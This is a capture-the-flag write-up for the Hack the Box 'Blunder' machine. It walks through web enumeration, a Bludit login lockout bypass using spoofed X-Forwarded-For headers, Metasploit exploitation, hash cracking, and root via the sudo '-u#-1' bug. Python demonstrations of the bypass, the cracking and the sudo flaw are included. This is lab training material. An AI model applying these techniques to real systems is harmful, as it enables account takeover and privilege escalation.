
HTB: Blunder – Write‑up

A write-up and walkthrough for the Hack the Box machine: Blunder

Info

  • Target: 10.10.10.191
  • Difficulty: Easy
  • OS: Linux

Initial Nmap Scan

An Nmap scan was performed to identify open ports and running services:

nmap -sC -sV -p- -oN nmap 10.10.10.191

Nmap Scan

The scan shows two ports of interest:

  • Port 21 (FTP) closed
  • Port 80 (HTTP) open

With port 80 being the only accessible service, further enumeration focused on the web application.

Enumerating the Webserver

Webpage

The main page presents a CMS-based website. While browsing the exposed links, a content discovery fuzz was run in parallel using the SecLists common.txt wordlist, looking for .txt files:

wfuzz -c -w /root/htb/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u 10.10.10.191/FUZZ.txt

  • --hc 404,403 hides 404 and 403 responses so that only real hits are listed.

Fuzz

The scan identified an exposed /todo.txt file which disclosed:

  • A CMS is in use
  • FTP has been disabled
  • fergus is a possible user target

todo.txt

Given that a user may need to log in, the typical login directories were tested:

  • login/
  • admin/ -> Discovered a login portal

Login

This login page shows that we’re dealing with the Bludit CMS. Inspecting the page source did not reveal a version number, so I searched for public exploits for Bludit.

A Metasploit module for a PHP image upload vulnerability exists, though it requires valid credentials:

Metasploit Search

Given that there weren’t many blog posts, the hint was to enumerate each post for clues: any unusual words or potential typos.

The Stephen King post stood out: a name was written as ‘FirstNameLastName’, i.e. “RolandDeschain” (a character from Stephen King’s The Dark Tower series). Since the rest of the site seemed well-written, this looked like the unusual typo the hint referred to, and a plausible password.

Entering RolandDeschain with the username fergus grants access to the CMS platform.

USERNAME - fergus

PASSWORD - RolandDeschain

Logged In

2026 Update: Alternate (and preferred) way of getting the password:

  • Brute-forcing the password directly would have tripped Bludit’s rate-limiting, which temporarily blocks the client IP after a run of failed logins.
  • Bludit is an open-source CMS and the source code is publicly available on GitHub. Searching the repository for ‘version’ leads to the file that reports the installed version: Bludit Version - GitHub. Navigating to http://10.10.10.191/bl-plugins/version/metadata.json would have revealed version 3.9.2.
  • An authentication brute-force bypass exists for Bludit versions up to and including 3.9.2: the lockout is keyed on the client IP, and Bludit takes that IP from the X-Forwarded-For header when one is present, so sending a different header value with every request means no single IP ever reaches the failure threshold.
  • Using CeWL we could spider the website and collect words of 6 letters or more as password candidates:

    cewl -w wordlist.txt -m 6 http://10.10.10.191

    With this wordlist the bypass can be used to brute-force passwords for the fergus user, ultimately giving RolandDeschain as the password.
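The bypass described above, as an added example that is not part of the original post or of Bludit: FakeBludit is a constructed stand-in for the real /admin/login endpoint (the 10-failure threshold and the response strings are assumptions; the form fields tokenCSRF, username and password and the hidden input id jstokenCSRF are Bludit’s), and WORDLIST is a made-up list in the shape CeWL would produce. Against the real box the two FakeBludit calls would become a GET and a POST to http://10.10.10.191/admin/login on a requests session; the rest of the loop stays the same.

```python
import random
import re


class FakeBludit:
    """Constructed stand-in for Bludit 3.9.2's /admin/login (not Bludit code).
    It mirrors only the behaviour that matters: the lockout counter is keyed
    on the client IP, and the IP is taken from X-Forwarded-For when present."""

    FAILURES_ALLOWED = 10  # assumption: failed attempts before an IP is blocked

    def __init__(self, username, password):
        self._users = {username: password}
        self._failures = {}          # "client IP" -> failed login count
        self.csrf = "7c1f0a9e"       # constructed CSRF token

    def login_page(self):
        # The real login form carries the token in a hidden input named tokenCSRF.
        return ('<form method="post">'
                f'<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="{self.csrf}">'
                '</form>')

    def _client_ip(self, headers, remote_addr):
        # Models Bludit's getUserIp(): X-Forwarded-For wins over REMOTE_ADDR.
        return headers.get("X-Forwarded-For", remote_addr)

    def login(self, form, headers, remote_addr="10.10.14.5"):
        ip = self._client_ip(headers, remote_addr)
        if self._failures.get(ip, 0) >= self.FAILURES_ALLOWED:
            return 200, "IP address has been blocked"
        if form.get("tokenCSRF") != self.csrf:
            return 200, "CSRF token is not valid"
        if self._users.get(form.get("username")) == form.get("password"):
            return 302, "redirect to dashboard"
        self._failures[ip] = self._failures.get(ip, 0) + 1
        return 200, "Username or password incorrect"


def extract_csrf(html):
    """Pull the tokenCSRF value out of the login page."""
    m = re.search(r'name="tokenCSRF"\s+value="([^"]+)"', html)
    if not m:
        raise ValueError("no tokenCSRF on login page")
    return m.group(1)


def brute_force(server, username, candidates, rotate_xff=True):
    """Try each candidate password once against `server`.

    With rotate_xff every request carries a fresh X-Forwarded-For value, so
    no single "IP" ever reaches the failure threshold and the lockout never
    triggers. Returns (password_or_None, attempts_made, locked_out)."""
    token = extract_csrf(server.login_page())
    rng = random.Random(0)  # fixed seed only so the run is reproducible
    for attempts, candidate in enumerate(candidates, start=1):
        headers = {}
        if rotate_xff:
            headers["X-Forwarded-For"] = ".".join(str(rng.randint(1, 254)) for _ in range(4))
        form = {"tokenCSRF": token, "username": username, "password": candidate}
        status, body = server.login(form, headers)
        if status == 302:
            return candidate, attempts, False
        if "blocked" in body:
            return None, attempts, True
    return None, len(candidates), False


# Constructed wordlist in the shape `cewl -m 6` would produce from the blog.
WORDLIST = [
    "Blunder", "Stephen", "Bludit", "images", "planet", "Marvel", "Comics",
    "Hitchhiker", "Galaxy", "Herbert", "Arrakis", "Atreides", "Thanos",
    "Endgame", "Avengers", "Gunslinger", "Midworld", "Deschain", "Roland",
    "Kingdom", "RolandDeschain", "Wizard",
]


def demo():
    """Same wordlist twice: without header rotation the 11th request is refused
    by the lockout; with rotation the 21st candidate logs in."""
    naive = brute_force(FakeBludit("fergus", "RolandDeschain"), "fergus", WORDLIST, rotate_xff=False)
    bypass = brute_force(FakeBludit("fergus", "RolandDeschain"), "fergus", WORDLIST)
    return naive, bypass


if __name__ == "__main__":
    print(demo())
```

The naive run stops at attempt 11 with the lockout message and never reaches the real password; the rotating run gets the 302 on attempt 21. Note that the counter is reset per spoofed address, so even a candidate list far longer than the threshold never trips it.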

Exploiting BLUDIT

With valid credentials, we can load Metasploit and select the image upload module:

Metasploit Search

use exploit/linux/http/bludit_upload_images_exec

The appropriate options were set for the target and the fergus credentials:

Metasploit Module Options

After successful execution, running getuid shows that we have a session as the www-data account:

getuid

Getting user.txt

While navigating the system, the bludit/databases/ directory contains a users.php file listing the users and their salted, hashed passwords. The admin hash could not be cracked.

Outside of the initial directory, a newer (and currently unused) version of Bludit was present; its users.php file contained a new user named hugo with the hash: faca404fd5c0a31cf1897b823c695c85cffeb98d

Cracking with john and the rockyou.txt wordlist was initially unsuccessful. However, the CrackStation rainbow tables cracked it:

Cracked Hash

Password120
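Bludit’s users.php is a PHP guard line followed by JSON, and each record carries a salt next to the hash. The following added example (not code from the post or from Bludit) parses that file and runs a small offline crack. The admin and fergus records, their salts and the salt on the hugo record are constructed; the hugo hash is the one quoted above; the one assumption about the CMS itself is Bludit 3.x’s hash construction, sha1(password + salt). Each candidate is also tried as plain sha1(candidate), because an unsalted lookup service such as CrackStation can only have matched the hash in that form.

```python
import hashlib
import json


def bludit_hash(password, salt):
    """Bludit 3.x stores sha1(password + salt) as a hex string in users.php."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def parse_users_php(text):
    """users.php is a PHP guard line followed by a JSON object; strip the guard."""
    body = text.split("?>", 1)[1] if text.lstrip().startswith("<?php") else text
    return json.loads(body)


def crack_users(users, wordlist):
    """Return {username: (password, mode) or None}.

    Every candidate is tried twice: as sha1(candidate + salt), which is how
    Bludit writes the hash, and as plain sha1(candidate), the only form an
    unsalted lookup table such as CrackStation can resolve."""
    results = {}
    for name, record in users.items():
        target = record["password"].lower()
        salt = record.get("salt", "")
        results[name] = None
        for candidate in wordlist:
            if bludit_hash(candidate, salt) == target:
                results[name] = (candidate, "salted")
                break
            if hashlib.sha1(candidate.encode()).hexdigest() == target:
                results[name] = (candidate, "unsalted")
                break
    return results


# Constructed users.php: the admin and fergus records are made up (the admin
# hash is of a password that is in no wordlist); the hugo hash is the one
# found on the box, paired here with a made-up salt.
SAMPLE_USERS_PHP = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps({
    "admin": {"nickname": "Admin", "role": "admin",
              "password": bludit_hash("not-in-any-wordlist-4f9c", "e86a7b3c"), "salt": "e86a7b3c"},
    "fergus": {"nickname": "Fergus", "role": "author",
               "password": bludit_hash("RolandDeschain", "2c8d19a0"), "salt": "2c8d19a0"},
    "hugo": {"nickname": "Hugo", "role": "author",
             "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", "salt": "jqxpjfnv"},
}, indent=1)

# Constructed candidate list; a real run would feed rockyou.txt or a CeWL list.
WORDLIST = ["password", "Password120", "RolandDeschain", "bludit123"]


def demo():
    return crack_users(parse_users_php(SAMPLE_USERS_PHP), WORDLIST)


if __name__ == "__main__":
    for user, hit in demo().items():
        print(user, hit)
```

The mode field is the useful signal: a "salted" hit means the password was set through the CMS, while an "unsalted" hit means the hash was dropped into the file by hand and the salt is dead weight, which is exactly the situation a rainbow table can exploit.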

Given how common password re-use is, there’s a good chance the same password works for the hugo system account, so the next step is to switch user.

The current shell is limited, so an interactive TTY is needed. Running which python shows that python is installed:

Shell

The following python one-liner can spawn an interactive shell

python -c "import pty;pty.spawn('/bin/bash')"

TTY Shell

It is now possible to switch user to hugo

Switch User

user.txt can be read

cat /home/hugo/user.txt

Gaining root.txt

With user access, the id command shows whether the account has any special group memberships or privileges:

id

Running find / -perm 1001 2>/dev/null to look for SUID misconfigurations returns nothing. Note that -perm 1001 only matches files whose mode is exactly 1001 (sticky bit plus other-execute), so this command would miss real SUID binaries; the SUID bit is matched with -perm -4000 (or -perm -u=s).

find

Checking for sudo privileges with sudo -l:

sudo -l result

(ALL, !root) /bin/bash is an unusual sudo configuration: it allows hugo to run /bin/bash as any user except root.

A public proof-of-concept for this sudo bug (CVE-2019-14287, fixed in sudo 1.8.28) shows that the restriction can be bypassed by requesting the numeric target uid -1:

sudo -u#-1 /bin/bash

The bypass works because the Runas check only refuses uid 0 (root), and -1, stored in an unsigned uid_t as 4294967295, is not 0, so the policy allows it. sudo then calls setresuid() with that value, and the kernel treats a uid of -1 as “leave unchanged”; since sudo is already running as root at that point, the shell keeps uid 0. sudo -u#4294967295 /bin/bash works for the same reason. The result is a root shell:

root
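A simplified model of why the bypass works, as an added example rather than sudo’s own code: parse_runas_uid and runas_permitted are a stripped-down imitation of sudo’s handling of -u '#N' and of a Runas_Spec such as (ALL, !root), simulate_sudo chains them the way sudo does, and setresuid_minus_one_is_noop shows the kernel side by calling os.setresuid(-1, -1, -1) in the current, unprivileged process and checking that nothing changed. The "denied" string and the 32-bit uid_t width are assumptions of the model.

```python
import os

UID_T_MAX = 0xFFFFFFFF  # (uid_t)-1 with a 32-bit uid_t (assumption of the model)


def parse_runas_uid(spec):
    """sudo -u '#N' selects a target user by numeric uid.

    Before sudo 1.8.28 a negative N was accepted and stored in a uid_t, so
    '#-1' became 4294967295, the same value as '#4294967295'."""
    if not spec.startswith("#"):
        raise ValueError("expected '#<uid>'")
    return int(spec[1:], 10) & UID_T_MAX


def runas_permitted(target_uid, denied_uids=(0,)):
    """Simplified model of the '(ALL, !root)' Runas_Spec: every target uid is
    allowed except the ones explicitly denied. 4294967295 != 0, so it passes."""
    return target_uid not in denied_uids


def setresuid_minus_one_is_noop():
    """The kernel side: setresuid() treats (uid_t)-1 as 'leave this id alone'.
    Safe to run unprivileged because nothing is actually changed."""
    before = (os.getuid(), os.geteuid())
    if hasattr(os, "setresuid"):
        os.setresuid(-1, -1, -1)
    else:                      # e.g. macOS: setreuid() has the same -1 convention
        os.setreuid(-1, -1)
    return (os.getuid(), os.geteuid()) == before


def simulate_sudo(spec, sudo_euid=0):
    """Model of `sudo -u <spec> /bin/bash` under (ALL, !root) on sudo < 1.8.28.

    sudo is setuid-root, so by the time it switches identity its euid is
    already 0 (sudo_euid). Returns the uid the command would run as, or
    'denied' when the policy refuses the target."""
    target = parse_runas_uid(spec)
    if not runas_permitted(target):
        return "denied"
    # The switch is setresuid(target, target, target). (uid_t)-1 is a no-op,
    # so the process keeps the euid it already has, which is root's.
    return sudo_euid if target == UID_T_MAX else target


if __name__ == "__main__":
    for spec in ("#0", "#1000", "#-1", "#4294967295"):
        print(spec, "->", simulate_sudo(spec))
```

The two halves fail independently of each other: the policy half rejects only the literal root uid, and the kernel half silently ignores the one value the policy let through. The 1.8.28 fix closes the first half by refusing -1 and 4294967295 as target ids before any identity switch is attempted.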

With root, it is then possible to read root.txt

cat /root/root.txt

This post is licensed under CC BY 4.0 by the author.